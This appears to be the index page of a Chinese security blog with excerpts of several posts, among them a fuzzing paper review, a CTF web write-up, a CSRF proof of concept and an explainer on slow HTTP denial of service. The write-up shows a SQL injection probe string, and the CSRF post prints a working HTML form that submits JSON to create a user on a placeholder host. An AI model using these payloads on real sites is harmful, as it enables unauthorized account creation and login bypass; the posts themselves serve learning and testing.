[新] 论文精读:Coverage-based greybox fuzzing as markov chain

作者: 浏览次数: 时间: 2019-05-06 评论: 2条评论

1.png
2.png


致谢自己的二零一七

作者: 浏览次数: 1530 时间: 2018-01-01 评论: 暂无评论

IMG_5520.JPG

真的是转眼间2017就彻底告别了,以后不会再有2017,不会再有这一年的自己。说起来2017对于自己来说真的是精彩的一年。

实验吧WEB部分题解

作者: 浏览次数: 2168 时间: 2017-12-15 评论: 2条评论

写在前面

之前做的,整理笔记发出来记录一下

一、登陆一下好吗??

根据提示:
1.png

说明是一个注入题目,由于已经说了过滤了一切,所以需要看看到底过滤了什么。
01.png

提交:

username=' and or union select " < ( ) >-- #aa&password=

返回:

username:' and " < ( ) > aa

说明过滤了 or union select -- #
重新来审视这个题目,页面是一个登陆的页面,提示注入,出题者的意图其实就是让我们使用万能密码的方式进行登陆,登陆成功后,就是成功注入。但是经过上面的尝试可以知道,万能密码所需要的关键字:or union select已经被过滤了。这就需要根据实际情况进行测试了,我们可以猜测系统登陆的代码如下:




博客换血

作者: 浏览次数: 1496 时间: 2017-12-07 评论: 暂无评论

原来博客想搞一个HTTPS,结果各种调试不成功,把原来的博客搞的乱七八糟,于是就重新安装了一个,文章也就重新发了一遍。
这算不算是作呢~

CSRF漏洞中以form形式用POST方法提交json数据的POC

作者: 浏览次数: 1706 时间: 2017-12-07 评论: 暂无评论

0x01 写在前面

今天遇到的,查了很多资料,发现这种形式的基本上没看到,圈子里某个师傅发了一个国外的链接,

参考了一下,最后成功构造poc。

0x02 POC

form提交post数据很简单,如下:

 <html>  
 <head>
    <title>This i a CSRF test!</title>
 </head>
 <form action="http://xxx.com/db/adds" method="post" enctype="text/plain" >  
<input name='{"attributes":{"name":"test3@test.com","userName":"test1","password":"e10adc3949ba59abbe56e057f20f883e","role":"user","status":"enabled", "phone":""}}'type='hidden'>  
 <input type=submit>  
 </form>  
 </html>

但是这种方式存在缺陷,如下图:
01.png


缓慢的Http拒绝服务攻击漏洞的验证(slowhttptest的安装)

作者: 浏览次数: 2304 时间: 2017-12-07 评论: 暂无评论

0x01 前言

主要记录缓慢的Http拒绝服务攻击漏洞的验证过程。

0x02 什么是Http拒绝服务攻击?

缓慢的http拒绝服务攻击是一种专门针对于Web的应用层拒绝服务攻击,攻击者操纵网络上的肉鸡,对目标Web服务器进行海量http request攻击,直到服务器带宽被打满,造成了拒绝服务。
慢速HTTP拒绝服务攻击经过不断的演变和发展,主要有三种攻击类型,分别是Slow headers、Slow body、Slow read。以Slow headers为例,Web应用在处理HTTP请求之前都要先接收完所有的HTTP头部,因为HTTP头部中包含了一些Web应用可能用到的重要的信息。攻击者利用这点,发起一个HTTP请求,一直不停的发送HTTP头部,消耗服务器的连接和内存资源。抓包数据可见,攻击客户端与服务器建立TCP连接后,每40秒才向服务器发送一个HTTP头部,而Web服务器再没接收到2个连续的rn时,会认为客户端没有发送完头部,而持续的等等客户端发送数据。如果恶意攻击者客户端持续建立这样的连接,那么服务器上可用的连接将一点一点被占满,从而导致拒绝服务。这种攻击类型称为慢速HTTP拒绝服务攻击。


Top ↑